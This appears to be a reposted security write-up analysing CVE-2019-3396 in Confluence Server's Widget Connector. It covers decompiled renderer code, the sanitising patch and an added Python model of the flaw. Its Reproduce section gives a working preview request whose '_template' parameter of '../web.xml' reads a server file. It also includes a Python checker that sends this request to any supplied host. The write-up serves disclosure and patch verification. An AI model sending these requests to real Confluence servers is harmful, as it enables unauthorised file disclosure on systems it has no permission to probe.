Nytro

[CVE-2019-3396]: SSTI and RCE in Confluence Server via Widget Connector


Posted 2019-04-06 | Category: Web Security | Views: 1141

Twitter: chybeta

Security Advisory

https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html


Analysis

According to the documentation, the Widget Connector macro takes three parameters that control the content or format of its output: URL, Width and Height.


The Widget Connector defines a number of renderers, one per supported site. Take FriendFeedRenderer as an example:

public class FriendFeedRenderer implements WidgetRenderer
{
    ...

    public String getEmbeddedHtml(String url, Map<String, String> params) {
        // the renderer sets _template itself, so any value the caller put in params is overwritten
        params.put("_template", "com/atlassian/confluence/extra/widgetconnector/templates/simplejscript.vm");
        return this.velocityRenderService.render(getEmbedUrl(url), params);
    }
}

In FriendFeedRenderer's getEmbeddedHtml, note that the renderer itself puts the extra _template entry into the params map (overwriting whatever the caller supplied) before handing the map to the render service.

Some other renderers, however, such as the ones in the video category, call render(getEmbedUrl(url), params) directly without setting _template first.

So for those renderers nothing sets _template, and we can supply it ourselves as a macro parameter: the backend passes the map through unchanged to the render service, which loads whatever file _template names as the Velocity template.
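To make the flow concrete, here is an added model of the two renderer behaviours and of the patch, written for this page rather than taken from the Confluence plugin. BASE_DIR, DEFAULT_TEMPLATE, the VideoRenderer/RenderManager names and the in-memory file table are constructed assumptions that mirror the decompiled snippets; the real plugin resolves templates through Velocity's resource loaders, which the model reduces to a path join with no containment check.

```python
"""Model of the Widget Connector parameter flow discussed above.

Added illustration, not Confluence's own code. The names (BASE_DIR,
VideoRenderer, RenderManager, DEFAULT_TEMPLATE) and the in-memory
"filesystem" are constructed to mirror the decompiled snippets.
"""
import posixpath

# Constructed stand-in for the deployed webapp. Templates live under the
# plugin's classpath directory; web.xml sits above it, which is exactly what
# "../web.xml" in the reproduction request reaches.
BASE_DIR = "/opt/confluence/WEB-INF/classes"
TEMPLATES = "com/atlassian/confluence/extra/widgetconnector/templates"
FILES = {
    f"{BASE_DIR}/{TEMPLATES}/simplejscript.vm": '<script src="$url"></script>',
    f"{BASE_DIR}/{TEMPLATES}/video.vm": '<iframe src="$url"></iframe>',
    "/opt/confluence/WEB-INF/web.xml": "<web-app><servlet>...</servlet></web-app>",
}
DEFAULT_TEMPLATE = f"{TEMPLATES}/video.vm"  # assumed fallback, not from the page


def velocity_render(url: str, params: dict) -> str:
    """Stand-in for velocityRenderService.render(): the template is whatever
    '_template' names, resolved relative to BASE_DIR with no containment
    check, so '..' segments walk out of the template directory."""
    name = params.get("_template", DEFAULT_TEMPLATE)
    path = posixpath.normpath(posixpath.join(BASE_DIR, name))
    return FILES[path].replace("$url", url)


class FriendFeedRenderer:
    """Overwrites _template before rendering, so a caller-supplied value
    never reaches the loader (matches the decompiled FriendFeedRenderer)."""

    def matches(self, url: str) -> bool:
        return "friendfeed.com" in url

    def get_embedded_html(self, url: str, params: dict) -> str:
        params["_template"] = f"{TEMPLATES}/simplejscript.vm"
        return velocity_render(url, params)


class VideoRenderer:
    """Passes params straight through, as the write-up says the video
    renderers do; this is the vulnerable path."""

    def matches(self, url: str) -> bool:
        return "viddler.com" in url

    def get_embedded_html(self, url: str, params: dict) -> str:
        return velocity_render(url, params)


class RenderManager:
    renderers = [FriendFeedRenderer(), VideoRenderer()]

    def get_embedded_html(self, url: str, params: dict) -> str:
        for renderer in self.renderers:
            if renderer.matches(url):
                return renderer.get_embedded_html(url, params)
        raise ValueError("no renderer for " + url)


SANITIZE_FIELDS = ("_template",)


def widget_macro_execute(parameters: dict, fixed: bool) -> str:
    """WidgetMacro.execute(): 'fixed' toggles the doSanitizeParameters step
    that the patch added in front of renderManager.getEmbeddedHtml()."""
    if fixed:
        for field in SANITIZE_FIELDS:
            parameters.pop(field, None)
    return RenderManager().get_embedded_html(parameters["url"], parameters)


# Macro parameters as they arrive from the preview request in the write-up.
ATTACK = {"url": "https://www.viddler.com/v/test", "width": "1000",
          "height": "1000", "_template": "../web.xml"}

if __name__ == "__main__":
    print(widget_macro_execute(dict(ATTACK), fixed=False))  # web.xml content
    print(widget_macro_execute(dict(ATTACK), fixed=True))   # the video iframe
```

Running the unfixed path with the write-up's parameters returns the web.xml stand-in; the same request against the sanitised path falls back to the video template, and the FriendFeed path never honours the caller's _template at all because the renderer overwrites it.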


Reproduce

POST /rest/tinymce/1/macro/preview HTTP/1.1

{
  "contentId": "65601",
  "macro": {
    "name": "widget",
    "params": {
      "url": "https://www.viddler.com/v/test",
      "width": "1000",
      "height": "1000",
      "_template": "../web.xml"
    },
    "body": ""
  }
}
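The request above, turned into a small checker. This is an added example, not part of the original write-up: build_preview_request() reproduces the JSON body shown in the post, looks_like_web_xml() is an assumed heuristic for telling a leaked servlet descriptor apart from normal widget markup, and check_target() posts the body with urllib (with an assumed Content-Type header the original request omits) only when a base URL is passed on the command line.

```python
"""Checker for the CVE-2019-3396 reproduction request shown above.

Added example, not from the original write-up. Run without arguments to
print the payload; pass a base URL (e.g. http://confluence:8090) to send it.
Only use against systems you are authorised to test.
"""
import json
import sys
import urllib.error
import urllib.request

PREVIEW_PATH = "/rest/tinymce/1/macro/preview"


def build_preview_request(content_id: str = "65601",
                          template: str = "../web.xml") -> dict:
    """Body for the macro preview endpoint, as in the write-up, with the
    undocumented _template parameter carried alongside url/width/height."""
    return {
        "contentId": content_id,
        "macro": {
            "name": "widget",
            "params": {
                "url": "https://www.viddler.com/v/test",
                "width": "1000",
                "height": "1000",
                "_template": template,
            },
            "body": "",
        },
    }


def looks_like_web_xml(body: str) -> bool:
    """Assumed heuristic: a leaked web.xml has been run through Velocity as a
    template, so match on tags that survive that rather than an exact file."""
    return "<web-app" in body and "<servlet" in body


def check_target(base_url: str, timeout: float = 10.0) -> bool:
    """POST the preview request to base_url and report whether web.xml
    content came back. The Content-Type header is an assumption; the
    original request in the write-up shows only the request line and body."""
    data = json.dumps(build_preview_request()).encode()
    req = urllib.request.Request(
        base_url.rstrip("/") + PREVIEW_PATH, data=data, method="POST",
        headers={"Content-Type": "application/json"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return looks_like_web_xml(resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError:
        # a 4xx/5xx means the preview was not rendered, so nothing leaked
        return False


# Constructed sample responses for exercising looks_like_web_xml offline.
SAMPLE_LEAK = ('<?xml version="1.0"?><web-app><servlet>'
               '<servlet-name>x</servlet-name></servlet></web-app>')
SAMPLE_CLEAN = '<iframe src="https://www.viddler.com/v/test"></iframe>'

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print("vulnerable" if check_target(sys.argv[1]) else "not vulnerable")
    else:
        print(json.dumps(build_preview_request(), indent=2))
```

The same two helpers serve a patched-host check: after the fix the server strips _template before rendering, so the response is the ordinary video embed and looks_like_web_xml() returns False.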


Patch

In the fixed version, WidgetMacro calls doSanitizeParameters before rendering the HTML, which strips _template from the parameter map. The decompiled code looks roughly like this:

public class WidgetMacro
    extends BaseMacro
    implements Macro, EditorImagePlaceholder
{
    public WidgetMacro(RenderManager renderManager, LocaleManager localeManager, I18NBeanFactory i18NBeanFactory)
    {
        ...
        // parameters that must never come from the macro body
        this.sanitizeFields = Collections.unmodifiableList(Arrays.asList(new String[] { "_template" }));
    }

    ...

    public String execute(Map<String, String> parameters, String body, ConversionContext conversionContext) {
        ...
        // strip _template before any renderer sees the map
        doSanitizeParameters(parameters);

        return this.renderManager.getEmbeddedHtml(url, parameters);
    }

    private void doSanitizeParameters(Map<String, String> parameters)
    {
        Objects.requireNonNull(parameters);
        for (String sanitizedParameter : this.sanitizeFields) {
            parameters.remove(sanitizedParameter);
        }
    }
}

 

Source: https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/
